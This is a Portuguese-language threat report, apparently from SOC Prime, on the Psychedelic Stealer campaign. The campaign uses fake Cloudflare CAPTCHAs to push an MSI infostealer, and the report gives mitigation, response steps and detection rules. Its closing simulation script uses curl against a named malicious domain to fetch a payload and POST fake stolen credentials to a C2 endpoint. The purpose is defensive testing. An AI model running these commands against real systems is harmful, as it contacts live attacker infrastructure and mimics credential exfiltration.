SOC Prime Bias: High

25 Sep 2026 14:16 UTC

O Roubador Psicodélico: Quando um CAPTCHA se Torna um Instalador

Author Photo
SOC Prime Team linkedin icon Seguir
O Roubador Psicodélico: Quando um CAPTCHA se Torna um Instalador
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

A Arctic Wolf Labs está acompanhando uma campanha que usa iscas de CAPTCHA falsas do Cloudflare injetadas em sites de negócios ucranianos comprometidos. O ataque no estilo ClickFix convence os usuários a executar um pacote MSI que instala o Psychedelic Stealer, um infostealer projetado para coletar credenciais de navegador, tokens de conta e dados de carteiras de criptomoedas. O malware também suporta tarefa remota persistente por meio de infraestrutura dedicada de C2.

Investigação

A investigação revelou iframes injetados em sites legítimos ucranianos que redirecionam visitantes para um fluxo de verificação falso. Os analistas também identificaram um painel de gerenciamento de iscas com a marca Rublevka TDS, que controla configurações de comando e registra telemetria de visitantes. A análise técnica do payload MSI revelou uma URL de próxima etapa criptografada junto com as rotinas principais do malware para roubo de credenciais e dados.

Mitigação

As organizações devem monitorar a execução suspeita do Windows Installer (msiexec.exe) lançado por navegadores da web ou interfaces de linha de comando. O filtro da web deve bloquear domínios maliciosos conhecidos, enquanto os defensores também devem monitorar ativos web legítimos para injeções de iframe não autorizadas. Fortalecer os controles de endpoint em torno da criação de tarefas agendadas pode reduzir ainda mais o risco de persistência.

Resposta

Quando a atividade do Psychedelic Stealer é detectada, isole os endpoints afetados para impedir a exfiltração de dados ou movimentação lateral. Audite perfis de navegador e armazenamento local para credenciais comprometidas, tokens de autenticação e dados de carteiras. Revise a telemetria de rede para comunicação com infraestrutura de C2 conhecida e inspecione sistemas para tarefas agendadas não autorizadas ou hosts de mensagens nativas suspeitos.

<div class="wp-block-socprime-category-attack-flow attack-flow-class" data-title="Attack Flow" data-attack-flow="flowchart TDn step_drive_by["T1189 – Drive-by Compromise<br>Inject iframe into legitimate websites to load malicious script from fsputnik.com"]n step_input_capture["T1056 – Input Capture<br>Use JavaScript helper to copy a malicious Windows Installer command to the clipboard via fake Cloudflare CAPTCHA"]n step_ingress_transfer["T1105 – Ingress Tool Transfer<br>Download and install Psychedelic Stealer via msiexec.exe"]n rules_for_ingress_transfer("<b>Rule Name</b>: Suspicious File Download Direct IP (via proxy)<br/><b>Rule ID</b>: 0fa3da37-f604-4547-939f-1ec135990aad")n step_persistence["T1053.005 – Scheduled Task/Job: Scheduled Task<br>Establish persistence using a scheduled task named psychedelicloveUtils"]n step_credential_theft["Steal passwords and account tokens from Chromium-based browsers"]n step_c2_communication["T1071 – Application Layer Protocol<br>Communicate with C2 server at 193.178.159.128 to retrieve tasks and payloads"]n rules_for_c2_communication("<b>Rule Name</b>: Possible C2 Communications Over HTTP To Direct IP With Uncommon Port (via proxy)<br/><b>Rule ID

Fluxo de Ataque

Detecções

Entrada suspensa RunMRU com semântica LOLBin (via registry_event)

Equipe SOC Prime
25 Set 2026

Possível Tentativa de Instalação de Arquivo MSI Remoto (via cmdline)

Equipe SOC Prime
25 Set 2026

Possível Comunicação C2 por HTTP para IP Direto com Porta Incomum (via proxy)

Equipe SOC Prime
25 Set 2026

Download de Arquivo Suspeito IP Direto (via proxy)

Equipe SOC Prime
25 Set 2026

IOCs (HashSha256) para detectar: O Psychedelic Stealer: Quando um CAPTCHA se torna um Instalador

Regras AI do SOC Prime
25 Set 2026

IOCs (SourceIP) para detectar: O Psychedelic Stealer: Quando um CAPTCHA se torna um Instalador

Regras AI do SOC Prime
25 Set 2026

IOCs (DestinationIP) para detectar: O Psychedelic Stealer: Quando um CAPTCHA se torna um Instalador

Regras AI do SOC Prime
25 Set 2026

Detecção de Acesso à Infraestrutura do Psychedelic Stealer [Servidor Web]

Regras AI do SOC Prime
25 Set 2026

Execução de Simulação

  • Narrativa de Ataque & Comandos: O adversário visa infectar um alvo por meio de um mecanismo falso de CAPTCHA. A simulação irá imitar o comportamento do navegador da vítima: primeiro, navegando para a página de destino do atacante para evitar a inspeção inicial, depois solicitando o payload MSI malicioso e, finalmente, iniciando uma conexão C2 via um POST HTTP para o script de controle do atacante. Esta sequência é projetada para imitar os padrões de URI exatos identificados na infraestrutura do Psychedelic Stealer.

  • Script de Teste de Regressão: O seguinte script usa curl para simular os três estágios distintos da lógica de detecção.

    #!/bin/bash
    # Script de simulação para Acesso à Infraestrutura do Psychedelic Stealer
    
    TARGET_DOMAIN="uasputnik.com"
    
    echo "[+] Iniciando Simulação de Infraestrutura do Psychedelic Stealer..."
    
    # Fase 1: Simular visitar a página de destino (Seleção 1)
    echo "[*] Simulando solicitação GET para página de destino..."
    curl -s -X GET "http://$TARGET_DOMAIN/sputnik.html" -o /dev/null
    
    # Fase 2: Simular download do MSI malicioso (Seleção 2)
    echo "[*] Simulando solicitação GET para payload..."
    curl -s -X GET "http://$TARGET_DOMAIN/elita.msi" -o /dev/null
    
    # Fase 3: Simular Comunicação C2 via POST (Seleção 3)
    echo "[*] Simulando solicitação POST para ponto de extremidade C2..."
    curl -s -X POST "http://$TARGET_DOMAIN/admin777111777.php" -d "data=stolen_credentials" -o /dev/null
    
    echo "[+] Simulação completa. Verifique SIEM para alertas."
  • Comandos de Limpeza:

    # Como esta é uma simulação baseada em rede, nenhum arquivo é criado no sistema local 
    # a menos que solicitado especificamente. Nenhuma limpeza necessária para o sistema de arquivos local.
    echo "[+] Limpeza completa."